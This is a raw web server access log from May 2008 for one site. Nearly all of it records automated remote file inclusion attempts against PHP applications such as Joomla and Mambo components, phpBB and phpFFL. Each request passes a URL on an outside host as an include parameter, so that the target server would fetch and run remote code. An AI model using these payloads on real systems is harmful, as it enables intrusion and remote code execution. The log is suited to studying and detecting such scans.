99.175.236.97 - - [24/May/2008:10:31:06 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:31:06 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:31:07 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:31:07 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:31:07 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:31:08 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:31:08 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.249.155.6 - - [24/May/2008:10:31:28 -0700] "GET /logs//main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.249.155.6 - - [24/May/2008:10:31:32 -0700] "GET //main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:31:35 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:31:38 -0700] "GET /logs/access.log//include/logout.php?PSA_PATH=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:10:31:48 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:10:31:48 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
70.87.81.18 - - [24/May/2008:10:31:53 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.81.132 - - [24/May/2008:10:31:54 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.86.181.227 - - [24/May/2008:10:31:57 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:10:31:57 -0700] "GET /logs/access_071225.log//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.86.181.227 - - [24/May/2008:10:31:57 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:10:31:58 -0700] "GET //includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.86.181.227 - - [24/May/2008:10:31:58 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:10:31:58 -0700] "GET /logs//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.138.68.129 - - [24/May/2008:10:32:12 -0700] "GET /main.php?table=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:10:32:15 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:10:32:15 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:10:32:15 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:10:32:21 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:10:32:21 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
77.221.130.12 - - [24/May/2008:10:32:26 -0700] "GET /amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.103.23.40 - - [24/May/2008:10:32:43 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tenis-prerov.cz/albums/Kanar07/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:32:57 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:33:00 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:10:33:06 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:10:33:06 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:10:33:06 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.243.253.159 - - [24/May/2008:10:33:06 -0700] "GET /logs/index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:10:33:06 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:10:33:06 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.243.253.159 - - [24/May/2008:10:33:15 -0700] "GET /index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:10:33:35 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:10:33:57 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:10:33:59 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:10:33:59 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:10:34:08 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:10:34:08 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:10:34:08 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.86.181.227 - - [24/May/2008:10:34:13 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.180 - - [24/May/2008:10:34:15 -0700] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:10:34:22 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:10:34:23 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:10:34:24 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:10:34:24 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:34:26 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:34:26 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:34:27 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:34:27 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:34:27 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:34:27 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:34:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:34:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:34:51 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:34:51 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.128.131.80 - - [24/May/2008:10:34:51 -0700] "GET /logs/sitemap.php?mosConfig_admin_path=http://www.whitegreyblackhat.com/recommended/dotcomincome/mambo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
62.128.131.80 - - [24/May/2008:10:34:51 -0700] "GET /sitemap.php?mosConfig_admin_path=http://www.whitegreyblackhat.com/recommended/dotcomincome/mambo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:10:34:53 -0700] "GET /logs/index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:10:35:05 -0700] "GET /index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:10:35:29 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:10:35:30 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:10:35:33 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:10:35:33 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:10:35:34 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:10:35:34 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:10:35:44 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:10:35:44 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:10:35:44 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:36:09 -0700] "GET /logs/access_080218.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:36:10 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:36:10 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:10:36:19 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:10:36:21 -0700] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:10:36:21 -0700] "GET /logs/index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:10:36:21 -0700] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [24/May/2008:10:36:23 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.csccog.org/language/s.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
217.75.193.70 - - [24/May/2008:10:36:23 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bogazlikoyu.com//components/com_zoom/images/tetas.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:10:36:25 -0700] "GET /logs/access.log/index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [24/May/2008:10:36:28 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.csccog.org/language/s.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
217.75.193.70 - - [24/May/2008:10:36:28 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bogazlikoyu.com//components/com_zoom/images/tetas.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:10:36:31 -0700] "GET /index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:36:51 -0700] "GET /logs/access_080229.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:37:19 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:37:19 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:37:21 -0700] "GET /logs/access_080119.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:37:23 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:10:37:28 -0700] "GET /logs/access_080212.log/index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:37:38 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:10:37:58 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:38:01 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.80.107.90 - - [24/May/2008:10:38:09 -0700] "GET //admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.25.195.72 - - [24/May/2008:10:38:21 -0700] "GET /logs/amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://skyoffice.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
209.25.195.72 - - [24/May/2008:10:38:22 -0700] "GET /amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://skyoffice.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
62.75.184.73 - - [24/May/2008:10:38:37 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.184.73 - - [24/May/2008:10:38:38 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.86.181.227 - - [24/May/2008:10:38:43 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.86.181.227 - - [24/May/2008:10:38:43 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:38:48 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:38:48 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.184.73 - - [24/May/2008:10:38:50 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.184.73 - - [24/May/2008:10:38:50 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:10:39:15 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:39:46 -0700] "GET /logs/access_080312.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:39:46 -0700] "GET /logs//components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:40:00 -0700] "GET /logs/access_080313.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.240.231.154 - - [24/May/2008:10:40:10 -0700] "GET /logs/access_080218.log//admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
